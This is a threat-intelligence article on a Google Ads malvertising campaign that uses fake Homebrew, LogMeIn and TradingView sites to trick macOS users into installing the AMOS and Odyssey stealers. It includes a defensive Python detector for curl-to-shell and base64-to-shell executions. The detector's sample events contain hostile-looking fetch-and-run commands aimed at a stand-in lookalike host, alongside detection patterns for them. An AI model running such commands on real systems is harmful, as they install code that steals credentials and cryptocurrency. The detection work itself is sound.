Malvertising Campaign Delivers AMOS and Odyssey Stealer via Fake macOS Tool Sites
A sophisticated cybercriminal campaign has been identified targeting macOS users, particularly developers, by leveraging fake download portals that impersonate trusted platforms such as Homebrew, LogMeIn, and TradingView. The attackers have registered over 85 domains that closely mimic the legitimate sites of these popular tools, using convincing branding and user interfaces to deceive visitors. These malicious domains are promoted through Google Ads, ensuring that they appear prominently in search results and increasing the likelihood that unsuspecting users will visit them.

Once on the fake sites, users are instructed to copy and execute a curl command in their Terminal, which initiates the download and installation of infostealing malware. The primary payloads delivered in this campaign are AMOS (Atomic macOS Stealer) and Odyssey Stealer, both of which are capable of harvesting sensitive information such as system details, browser data, and cryptocurrency credentials from infected machines. The campaign employs advanced social engineering tactics, including clipboard manipulation and command obfuscation, to increase the success rate of infections.

Researchers from Hunt.io have mapped the infrastructure supporting this operation, noting that the attackers reuse IP addresses and SSL certificates across multiple domains, indicating a persistent and well-organized effort. The infrastructure has been active for several years, with some IP addresses registered under personal names, suggesting a degree of operational continuity and experience. The campaign does not rely on exploiting software vulnerabilities but instead exploits user trust in widely used open-source and financial tools. The use of Google Ads as a distribution vector highlights the attackers' willingness to invest in paid advertising to reach their targets.
The campaign's focus on the developer community is particularly concerning, as compromised developer systems could lead to broader supply chain risks. Security researchers have emphasized the importance of verifying download sources and being wary of unsolicited installation instructions, especially those involving Terminal commands. The ongoing nature of the campaign, with continuous adaptation of infrastructure and tactics, underscores the need for vigilance among macOS users. The discovery of this campaign began with public reports from independent researchers, which were then corroborated and expanded upon by threat intelligence teams. The scale and persistence of the operation suggest that it is likely to continue evolving, posing a significant threat to the macOS ecosystem. Organizations are advised to educate users about the risks of malvertising and to implement technical controls to block access to known malicious domains. The campaign demonstrates the increasing sophistication of social engineering attacks targeting macOS, a platform often perceived as less vulnerable than Windows.
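From the defender's side, the one observable this campaign always produces is a shell spawned by a terminal application that fetches a script with curl and runs it immediately, or decodes base64 text and runs that. The following Python is an added example (not code from Hunt.io, BleepingComputer, or Mallory) that scans process-execution events for that "paste this into Terminal" pattern and ranks each hit. The JSON-lines event format, the terminal application names, the allowlisted Homebrew installer URL prefix, and every sample event are assumptions constructed for the example; tune them to your own telemetry.

```python
"""Flag ClickFix-style curl-to-shell and base64-to-shell executions in process telemetry.

Added example for illustration; event schema and sample data are constructed, not real telemetry.
"""
import json
import re

# Interactive terminal apps on macOS (assumption: match your EDR's parent-process naming).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}
# URL prefixes whose curl-to-shell use is expected in your fleet (assumption: tune per environment).
ALLOWLISTED_PREFIXES = ("https://raw.githubusercontent.com/Homebrew/install/",)

DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")
SUBSTITUTION_RE = re.compile(r"\$\(\s*(?:curl|wget)\b|`\s*(?:curl|wget)\b")
BASE64_DECODE_RE = re.compile(r"\bbase64\b[^|]*(?:-d|-D|--decode)")
URL_RE = re.compile(r'''https?://[^\s"'|)`]+''')

# Constructed sample events, one JSON object per line (hypothetical schema).
SAMPLE_EVENTS = r"""
{"ts": "2025-06-01T10:00:01Z", "parent_process": "Terminal", "process": "bash", "command_line": "/bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""}
{"ts": "2025-06-01T10:05:12Z", "parent_process": "Terminal", "process": "sh", "command_line": "curl -fsSL https://brew-install.example/install.sh | sh"}
{"ts": "2025-06-01T10:07:40Z", "parent_process": "Terminal", "process": "bash", "command_line": "echo aGVsbG8= | base64 -d | bash"}
{"ts": "2025-06-01T10:09:00Z", "parent_process": "launchd", "process": "python3", "command_line": "python3 /usr/local/bin/updater.py"}
{"ts": "2025-06-01T10:10:30Z", "parent_process": "Terminal", "process": "zsh", "command_line": "ls -la"}
"""


def parse_events(jsonl_text):
    """Parse one JSON object per non-empty line into a list of event dicts."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def analyze_event(event):
    """Return a finding dict for a suspicious event, or None if nothing matched."""
    cmd = event.get("command_line", "")
    reasons = []
    if DOWNLOADER_RE.search(cmd) and PIPE_TO_SHELL_RE.search(cmd):
        reasons.append("download piped directly into a shell")
    if SUBSTITUTION_RE.search(cmd):
        reasons.append("download used as command substitution for a shell")
    if BASE64_DECODE_RE.search(cmd) and PIPE_TO_SHELL_RE.search(cmd):
        reasons.append("base64-decoded content piped into a shell")
    if not reasons:
        return None

    # Severity: only a literal URL under an allowlisted prefix, with no encoding, rates medium.
    urls = URL_RE.findall(cmd)
    unknown_urls = [u for u in urls if not u.startswith(ALLOWLISTED_PREFIXES)]
    uses_encoding = any("base64" in r for r in reasons)
    severity = "medium" if (urls and not unknown_urls and not uses_encoding) else "high"

    # Context, not a trigger: a terminal parent is consistent with a copy/paste lure.
    if event.get("parent_process") in INTERACTIVE_PARENTS:
        reasons.append("launched from an interactive terminal (consistent with copy/paste lure)")

    return {
        "ts": event.get("ts"),
        "process": event.get("process"),
        "severity": severity,
        "reasons": reasons,
        "urls": urls,
    }


def scan(jsonl_text):
    """Run analyze_event over every event and return the findings in input order."""
    findings = []
    for event in parse_events(jsonl_text):
        finding = analyze_event(event)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["ts"], f["severity"].upper(), f["process"], "|", "; ".join(f["reasons"]))
```

The allowlist deliberately lowers severity rather than suppressing the event: the genuine Homebrew installer is itself a curl-to-shell command, so the lookalike sites copy exactly that shape, and the only reliable difference is the host the script is fetched from. Anything with no literal URL, an unknown host, or a base64 decode stage stays high.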
How this story unfolded
4 events from the most recent confirmed update back to the earliest known activity.
Public reporting links Odyssey to Poseidon and AMOS lineage
Subsequent coverage described Odyssey as a newer macOS stealer derived from Poseidon and AMOS, while noting that AMOS had recently gained backdoor capabilities as part of its malware-as-a-service evolution. This added technical context to the campaign's tooling and threat profile.
Researchers identify broad campaign infrastructure and malware behavior
Hunt.io and BleepingComputer reported tracking more than 85 domains tied to the operation, with some malicious sites promoted through Google Ads. The malware was observed stealing browser data, credentials, and cryptocurrency-related information and exfiltrating it to attacker-controlled servers.
ClickFix lures used to install AMOS and Odyssey on macOS
The campaign used ClickFix-style social engineering to trick users into pasting and running malicious Terminal commands, bypassing normal macOS protections. These commands installed Atomic macOS Stealer (AMOS) and the newer Odyssey stealer on victim systems.
Attackers launch fake software sites targeting macOS developers
A malware campaign began using spoofed sites for popular developer and business tools, including Homebrew, LogMeIn, and TradingView, to target macOS users with infostealers. The operation relied on convincing download portals and search visibility tactics to reach victims.
Sources
AMOS, Odyssey stealers deployed via bogus tools (scworld.com)
Google ads for fake Homebrew, LogMeIn sites push infostealers (bleepingcomputer.com)
Odyssey Stealer & AMOS Hit macOS Developers with Fake Homebrew Sites (hunt.io)